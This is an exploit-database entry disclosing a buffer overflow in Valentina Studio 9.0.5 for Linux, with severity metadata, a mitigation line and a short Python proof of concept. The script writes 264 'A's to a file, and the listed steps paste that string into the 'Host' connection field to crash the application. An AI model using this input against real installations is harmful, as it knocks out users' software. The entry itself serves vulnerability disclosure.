Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)

vendor:

Valentina Studio

by:

Alejandra Sánchez

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Valentina Studio

Affected Version From: 9.0.5

Affected Version To: 9.0.5

Patch Exists: YES

Related CWE: N/A

CPE: a:valentina_software:valentina_studio

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux kali amd64

2019

Valentina Studio 9.0.5 Linux – ‘Host’ Buffer Overflow (PoC)

Valentina Studio 9.0.5 is vulnerable to a buffer overflow in the 'Host' field when connecting to Valentina Server or SQLite Server. By supplying a long string of 'A's, the application will crash.

Mitigation:

Valentina Studio should be updated to the latest version to fix this vulnerability.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)
# Date: 20/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://valentina-db.com/en/
# Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw
# Version: 9.0.5
# Tested on: Linux kali amd64

# Proof of Concept:
# 1.- Run the python script "vstudio.py", it will create a new file "vstudio.txt"
# 2.- Copy the text from the generated vstudio.txt file to clipboard
# 3.- Open VStudio
# 4.- Go to File > Connect to...
# 5.- Click on Valentina Server or SQLite Server
# 6.- Paste clipboard in 'Host' field
# 7.- Click on button -> Connect
# 8.- Crashed

buffer = "\x41" * 264
f = open ("vstudio.txt", "w")
f.write(buffer)
f.close()